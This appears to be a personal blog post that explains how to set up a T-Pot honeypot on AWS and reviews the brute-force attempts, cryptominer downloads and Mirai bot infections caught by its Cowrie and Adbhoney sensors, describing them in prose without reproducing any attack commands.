Catching malicious activities across cyber land
There are many ways to house these honeypots. My favorite way is to use a cloud service, AWS. AWS is quick and easy so I’ll get to it with a few bullet checklist below. (exercise google-fu if need be)
- Build VPC with VPC Wizard in AWS
- Create an EC2 instance with..
- Debian 10 Buster AMI
- t3.Xlarge instance type
- 128GB general purpose SSD2
- SSH into instance to update and upgrade
- Install git, clone tpotce repo, and install
- Set inbound security group for honeypot instance
- TCP 64295 <yourIPaddress> for SSH for Admin
- TCP 64297 <yourIPaddress> for Web Admin
- TCP 1–64000 0.0.0.0/0 for the bad guys
- Visit https://<ec2ipaddress>:64297
- Check Kibana and Spiderfoot
As you can see from the very top image, there are many attacks that had hit my honeypots. For today, I will focus on two honeypot.
1. Cowrie (4020 attacks)
2. Adbhoney (458 attacks)
The cowrie honeypot is designed to log bruteforce attacks and shell interactions when someone SSH or Telnet to our machine. The adbhoney honeypot is designed to catch malware activities from attacker hitting port 5555. As a reminder, both of these honeypots are built to be vulnerable on purpose so we can log activities and make analysis. Ok, let’s see what the active defense honeypots had picked up!
Off the back we can see from these pie charts
- There are known attacker at work.
- Attacks are coming from mostly in the United States.
- More SSH activities than Telnet since telnet has been depreciated due to known vulnerability and is no longer used in many companies. This result to telnet being less targeted.
- A vulnerable SSH-2.0-libssh2_1.4.3 version is used the most here.
- List of HASSH/IP fingerprints to help identify SSH clients and servers implementations.
A tag cloud of most used usernames and passwords to gain access to SSH and Telnet services of our cowrie honeypot.
- Common default usernames and passwords are used the most.
- There are a couple of IPs addresses running the same credential list suggests an automated brute force with the same password list.
Here is the bottom of the dashboard. What we had seen so far have been pretty high level view just to get the sense of the environment in Cowrie over the 50 hour time frame. Now, we can start tracking the src ip addresses, the Autonomous System Numbers (ASN), and the top malicious command line input used by the attackers.
Before I go into a rabbit hole of investigation here, let’s also give Adbhoney honeypot dashboard an introduction as well.
Now it time to look at some malwares that might be pushed by attackers
- Attacker known meaning there are some OSINT sources we can use to learn about our attacker
- The country where the attacks are interacting with the honeypot is also from US. A high level attacker can hide it’s true location so this data might not be as useful.
- The frequency in the attacks are consistent over the 50 hour time frame likely suggest attacks are scheduled and automated.
- ASN, src IPs, and command line input are my favorite sets of datas. The command line inputs are worth investigating farther because an attacker had gone far enough to input commands is likely trying to reach out to other machines to complete their attacks.
The Proof Is In The Pudding
Below are two videos where I will be diving into what Cowrie and Adbhoney had caught during the 50 hour time frame. My goal here is to show the process of using Kibana to farther your investigation and make analysis on the malicious activities found.
For the Cowrie honeypot, we found commands that downloaded malicious bash script and attempts to run on our machine. This was the Monero miner script trying to use our machine’s resources to mine Cryptos and then forward the Cryptos to a digital wallet. The activities is seen using multiple IPs address to achieve their goal.
For the Adbhoney honeypot, we saw command input that reached out to a link to download a file that is scripted to download more file. Those files are given full permission in linux and are executed. Attacker is intending to turn a targeted machine into a Mirai bot to add onto it army of botnet for potential DDoS attack.
Not to worry. Luckily, these activities are highly known as we saw in virustotal and joesandbox. Chances are your anti-virus or Windows Defenders are up to date with those malicious activities and known malicious IPs/URL. Ofcourse, disabling the ports that uses those vulnerable services is always a great idea. If you must have those ports open for service to run your business, best you patch/update the services you are using. Honeypots are great to slow down attackers and to learn their behavior through logs using Kabana.
I hoped you all enjoyed the journey on what honeypots can help do for us. Stay safe in the real world and the cyber world. See you all in the next discussion.